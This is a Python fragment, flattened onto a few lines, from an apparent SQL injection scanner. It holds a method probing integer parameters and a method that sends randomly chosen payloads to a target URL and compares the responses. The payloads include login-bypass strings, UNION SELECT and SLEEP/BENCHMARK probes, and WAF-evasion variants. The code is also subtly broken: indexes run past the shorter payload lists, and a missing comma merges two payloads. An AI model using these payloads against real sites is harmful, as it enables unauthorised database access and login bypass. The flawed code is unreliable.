def Integer_sqlinj_scan(self): try: res_md5_1 = md5_encrypt( requests.get(url=self.url, headers=HEADER).text) res_md5_2 = md5_encrypt( requests.get(url=self.url + urlencode('+1'), headers=HEADER).text) res_md5_3 = md5_encrypt( requests.get(url=self.url + urlencode('+1-1'), headers=HEADER).text) res_DOM_1 = DOM.check(self.url) res_DOM_2 = DOM.check(self.url + urlencode('+1')) res_DOM_3 = DOM.check(self.url + urlencode('+1-1')) except Exception as e: print(e) res_md5_1 = res_md5_2 = res_md5_3 = 0 pass if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ( (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2): return self.url return 0
def Str_sqlinj_scan(self, waf): quotes = ['\'', '"', ''] payload_0 = [ " and 0;-- ", "/**/and/**/0;#", "\tand\t0;#", "\nand/**/0;#", "\'-\'", "\' \'", "\'&\'", "\'^\'", "\'*\'", "\' or \'\'-\'", "\' or \'\' \'", "\' or \'\'&\'", "\' or \'\'^\'", "\' or \'\'*\'", "\"-\"", "\" \"", "\"&\"", "\"^\"", "\"*\"", "\" or \"\"-\"", "\" or \"\" \"", "\" or \"\"&\"", "\" or \"\"^\"", "\" or \"\"*\"", "or true--", "\" or true--", "\' or true--", "\") or true--", "\') or true--", "\' or \'x\'=\'x", "\') or (\'x\')=(\'x", "\')) or ((\'x\'))=((\'x", "\" or \"x\"=\"x", "\") or (\"x\")=(\"x", "\")) or ((\"x\"))=((\"x", "or 1=1", "or 1=1--", "or 1=1#", "or 1=1/*", "admin\' --", "admin\' #", "admin\'/*", "admin\' or \'1\'=\'1", "admin\' or \'1\'=\'1\'--", "admin\' or \'1\'=\'1\'#", "admin\' or \'1\'=\'1\'/*", "admin\'or 1=1 or \'\'=\'", "admin\' or 1=1", "admin\' or 1=1--", "admin\' or 1=1#", "admin\' or 1=1/*", "admin\') or (\'1\'=\'1", "admin\') or (\'1\'=\'1\'--", "admin\') or (\'1\'=\'1\'#", "admin\') or (\'1\'=\'1\'/*", "admin\') or \'1\'=\'1", "admin\') or \'1\'=\'1\'--", "admin\') or \'1\'=\'1\'#", "admin\') or \'1\'=\'1\'/*", "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055", "admin\" --", "admin\" #", "admin\"/*", "admin\" or \"1\"=\"1", "admin\" or \"1\"=\"1\"--", "admin\" or \"1\"=\"1\"#", "admin\" or \"1\"=\"1\"/*", "admin\"or 1=1 or \"\"=\"", "admin\" or 1=1", "admin\" or 1=1--", "admin\" or 1=1#", "admin\" or 1=1/*", "admin\") or (\"1\"=\"1", "admin\") or (\"1\"=\"1\"--", "admin\") or (\"1\"=\"1\"#", "admin\") or (\"1\"=\"1\"/*", "admin\") or \"1\"=\"1", "admin\") or \"1\"=\"1\"--", "admin\") or \"1\"=\"1\"#", "admin\") or \"1\"=\"1\"/*", "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"", " UNION ALL SELECT 1,2,3,4", " UNION ALL SELECT 1,2,3,4,5-- ", " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5", " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ", " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ", " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--", " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", ] payload_1 = [ " and 1;-- ", "/**/and/**/1;#", "\tand\t1;#", "\nand/**/1;#", "\'-\'", "\' \'", "\'&\'", "\'^\'", "\'*\'", "\' or \'\'-\'", "\' or \'\' \'", "\' or \'\'&\'", "\' or \'\'^\'", "\' or \'\'*\'", "\"-\"", "\" \"", "\"&\"", "\"^\"", "\"*\"", "\" or \"\"-\"", "\" or \"\" \"", "\" or \"\"&\"", "\" or \"\"^\"", "\" or \"\"*\"", "or true--", "\" or true--", "\' or true--", "\") or true--", "\') or true--", "\' or \'x\'=\'x", "\') or (\'x\')=(\'x", "\')) or ((\'x\'))=((\'x", "\" or \"x\"=\"x", "\") or (\"x\")=(\"x", "\")) or ((\"x\"))=((\"x", "or 1=1", "or 1=1--", "or 1=1#", "or 1=1/*", "admin\' --", "admin\' #", "admin\'/*", "admin\' or \'1\'=\'1", "admin\' or \'1\'=\'1\'--", "admin\' or \'1\'=\'1\'#", "admin\' or \'1\'=\'1\'/*", "admin\'or 1=1 or \'\'=\'", "admin\' or 1=1", "admin\' or 1=1--", "admin\' or 1=1#", "admin\' or 1=1/*", "admin\') or (\'1\'=\'1", "admin\') or (\'1\'=\'1\'--", "admin\') or (\'1\'=\'1\'#", "admin\') or (\'1\'=\'1\'/*", "admin\') or \'1\'=\'1", "admin\') or \'1\'=\'1\'--", "admin\') or \'1\'=\'1\'#", "admin\') or \'1\'=\'1\'/*", "1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055", "admin\" --", "admin\" #", "admin\"/*", "admin\" or \"1\"=\"1", "admin\" or \"1\"=\"1\"--", "admin\" or \"1\"=\"1\"#", "admin\" or \"1\"=\"1\"/*", "admin\"or 1=1 or \"\"=\"", "admin\" or 1=1", "admin\" or 1=1--", "admin\" or 1=1#", "admin\" or 1=1/*", "admin\") or (\"1\"=\"1", "admin\") or (\"1\"=\"1\"--", "admin\") or (\"1\"=\"1\"#", "admin\") or (\"1\"=\"1\"/*", "admin\") or \"1\"=\"1", "admin\") or \"1\"=\"1\"--", "admin\") or \"1\"=\"1\"#", "admin\") or \"1\"=\"1\"/*", "1234 \" AND 1=0 UNION ALL SELECT \"" " UNION ALL SELECT 1,2,3,4", " UNION ALL SELECT 1,2,3,4,5-- ", " UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5", " UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ", " AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ", " UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--", " RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='", ] payload_3 = [ " And 0;-- ", "/**/And/**/0;#", "\tAnd\t0;#", "\nAnd/**/0;#", " Union All Select 1,2,3,4", " Union All Select 1,2,3,4,5-- ", " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5", " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ", " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ", " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--", " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='", " And%200;--", " Union%20All%20Select%201,2,3,4", " Union%20All%20Select%201,2,3,4,5--", " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5", " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--", " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--", " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--", " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27", " chr(97)+chr(110)+chr(100) 0;-- ", " aandNandd 0;-- ", ] payload_4 = [ " And 0;-- ", "/**/And/**/0;#", "\tAnd\t0;#", "\nAnd/**/0;#", " Union All Select 1,2,3,4", " Union All Select 1,2,3,4,5-- ", " Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5", " Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ", " And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ", " Union All Select 'inj'||'ect'||'xxx',2,3,4,5--", " Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='", " And%200;--", " Union%20All%20Select%201,2,3,4", " Union%20All%20Select%201,2,3,4,5--", " Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5", " Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--", " And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--", " Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--", " Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27", " chr(97)+chr(110)+chr(100) 0;-- ", " aandNandd 0;-- ", ] for i in quotes: for j in range(10): if waf.cget("text") == 'WAF:None': p0 = i + payload_0[random.randint(0, 85)] p1 = i + payload_1[random.randint(0, 85)] else: p0 = i + payload_3[random.randint(0, 85)] p1 = i + payload_4[random.randint(0, 85)] try: res_md5_1 = md5_encrypt( requests.get(url=self.url, headers=HEADER).text) res_md5_2 = md5_encrypt( requests.get(url=self.url + urlencode(p0), headers=HEADER).text) res_md5_3 = md5_encrypt( requests.get(url=self.url + urlencode(p1), headers=HEADER).text) res_DOM_1 = DOM.check(self.url) res_DOM_2 = DOM.check(self.url + urlencode(p0)) res_DOM_3 = DOM.check(self.url + urlencode(p1)) except Exception as e: print(e) res_md5_1 = res_md5_2 = res_md5_3 = 0 pass if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ( (res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2): return p0 + "~" + self.url return 0